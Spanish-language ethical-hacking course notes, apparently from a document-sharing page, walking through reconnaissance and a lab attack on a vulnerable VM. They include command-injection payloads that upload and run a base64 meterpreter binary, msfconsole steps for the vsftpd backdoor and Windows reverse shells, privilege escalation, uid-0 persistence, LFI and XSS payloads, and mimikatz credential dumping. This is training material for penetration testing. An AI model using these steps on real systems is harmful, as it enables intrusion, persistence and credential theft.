Sie sind auf Seite 1von 16

HAKING ETICO

pablo@flu-project.com
www.modem.ie descargar maquians virtuales

Zabbix -> monitorizacion tipo nagios


Auditora de Seguridad
Footprint: Herramientas
La biblia del footprintitng
Anubis
http://pastebin.com/
url facebook program firefox
pipi agenda
http://www.exploit-db.com/
http://www.exploit-db.com/ghdb/3999/
Fingerprint: Ir a los servidores de la empresa y analizar que servicios ofrecen, version
software,.. Se pude engaar a las herramientas. Antifingerprint (no suele ser lo habitual).
Anlisis vulnerabilidad sobre lo obtenido del fingerprint
Explotacin vulnerabilidades
Informes
Webs interesantes Google hacking
http://www.e-fense.com/.listing
Vemos contenido del directorio
.bash_history
Bing hacking
IP:87.98.225.244
Hosting compartido, no es una buena prctica
Netcraft: anlisis dominios,..
http://www.shodanhq.com/ Busca mquinas
Anlisis vulnerabilidades -> Metaexploit
Exploit: programa que sabe aprovecharse de un fallo
Badstore.net distribucin con vulnerabilidades para testear

MAQUINA METAEXPLOIT
Command Injection
sacando un 404 (not fount) nos dir el S.O.
nmap -O -p 80 -sV 192.168.56.102
Nos saca que es un linux
podemos concatenar comandos en la caja de texto
;echo "Hola"
con el comando w nos die quien somos, normalmente www-data
Vamos a intentar coger el control de la maquina:
Opcion1: con wget podemos decargar un fichero al directorio donde estamos
;wget ....
Opcion2: Generar payload (codigo ejecutable) lo subimos en base64 a la maquina
remota, lo pasamos a binario y lo ejecutamos
Con metaexploit generamos este cdigo que ejecuta un mterpreter para linux
El cdigo est en base64
;echo "dada5d454d8sad3a1d3as4d8---" >/tmp/taes
;ls -l /tmp
(tendremos el fichero)
Transformamos el bse64 a binario:
;cat /tmp/taes | base64 -d > /tmp/taes.bin
(no tenemos permiso de ejeccion)
;chmod 755 /tmp/taes.bin
(Tenemos un binario subido a la maquina y con permisos)
Configuramos con metaexploit para que el paylod se nos conecte
ejecutamos el taes.bin
En el metaexploit ya tenemos una consola con comandos del meterpreter con permisos
limitados
getuid
(nos dice que es el 33 - www-data)
Recopilacion de informacin de ese sistema
Ver pgina web y sacar info de los php
Con la info del nmap anterior podemos ver la info del apache, buscar ms puertos:
ftp, ssh, telnet, smtp, dns,....
sacamos info del ssh
nmap -O -p 21,22 -sV 192.168.56.102

metaexploit buscamos vulnerabilidades


> search openssh 4.7
Buscamos en google: vsftp 2.4.3 exploit
>use exploit/unix/ftp/vsftp_2_4_3_backdoor
>set RHOST 192.168.56.102
>set payload cmd/unix/..
>exploit
Ya estamos dentro con una shell y somos root
id
root@sofi01:~# id
uid=0(root) gid=0(root) groups=0(root)
Para asegurar permisos al otro usuario:
Cambiamos el 33 en el /etc/password por 0 y reiniciando somos root
Creamos un usuairo con id 0

Vulnerabilidad LFI
Acceso ficheros locales
OWASP - ZAP
Navegador -> Proxy
Ponemos IP puerto de ZAP
En el ZAP vemos las cabeceras que se estn enviando a la web
Con SSL se complica.
Por qu ocurre?
PHP:
include $_GET[param]
url:.........../../../../etc/password
Podemo ver el contenido
Saltar proteccion byte null: Que nos pongan una extensin en el fichero
url:.........../../../../etc/password%00

OPEN DIRECTORY - BROWSING DIRECTORY


192.168.56.102/multididae/documentacion
Acceso a los ficheros -> Nos da informacin misc configuration

CROSS SITE SCRIPTING - XSS


Ataque al usuario a travs del servidor
Manipulamos una url para que cuando el usuario acceda ejecute cdigo js en el
navegador del usuario para por ejemplo enviar cookies, ..
Para ver si es vulnerable a esto:
Pgina ds lookup:
;<scritp>alert(1)</script>
Le hemos pasado un parmetro
Cmo le pasamos el parmetro al usuario:
http://dasdmsmdlas..../parametro=<script>alert(1)</script>

OPEN REDIRECT
Le pasamos a la url
http://amaddasd/google.com
https://www.google.com.sl/search?source=&q=www.elladodelmal.com&btnI=

EXPLOITS
- Buffer overflow
- Integer overflow
..
..
Exploitdb: Nos da la aplicacin vulnerable y el sploit
Hemos de fijarnos en el target que nos da las caractersticas del equipo que ha de tener
la vulnerabilidad
Demo: Kolibri
Metaexploit kali:
Modules -> /usr/share/metasploit-framework/modules/exploits/(Plataformas)....
msfcli
Kali -> SystemServices -> metaexploit -> start
msfconsole
Recargar modulos
reload_all
use exploit/window/http/33790
show options
info -> saca datos del exploit
set RHOST IP
set PAYLOAD windows/meterprter/reverse
set LHOST IP Maquina que devolver el control
exploit
getuid
(nos dice el usuario)
Nos devuelve una consola en el host remoto
Cuando es reverse le configuramos con lhost la ip a la que tiene que volver (tnel
inverso)
En el caso de bind (directo) nos esperar en un puerto
Si queremos hacer escala de privilegios
>use exploit/windows/local/bypasuac
podemos lanzar el exploit de ambito local por la sesin que hemos abierto previamente
>sessions
>set PAYLOAD win../meter/inver_tcp
>set LH
...

Si el usuario no pertenece al grupo administradores puede fallar


bypassuac es como evitar la ventana de ejecutar como administrador
use exploit/windows/local/ms14_058_track_popup_
set SESSION 4
set PAYLOAD...
set LHOST ..
exploit
Conseguimos elevacin privilegios system
En la consola de meterpreter podemos cargar mdulos:
>load mimekatz
Nos carga el comando wdigest con el que podemos ver las contraseas en plano ya que
windws cachea las credenciales (proeso lsass)

Armitage -> Interfaz grfica


Kali -> Explotation tools -> Network explotation -> Armitage
con session -i numero nos podemos conectar a sesiones que tengamos abiertas

setoolkit

podemos generar un script en poweshell para hacer un meterpreter y que se conecte a


nuestro equipo cuando se ejecute en la mquina
Opcin 1-> 9 -> 1

Nos pide datos:

El cdigo que nos devuelve lo copiamos en la poweshell destino

Das könnte Ihnen auch gefallen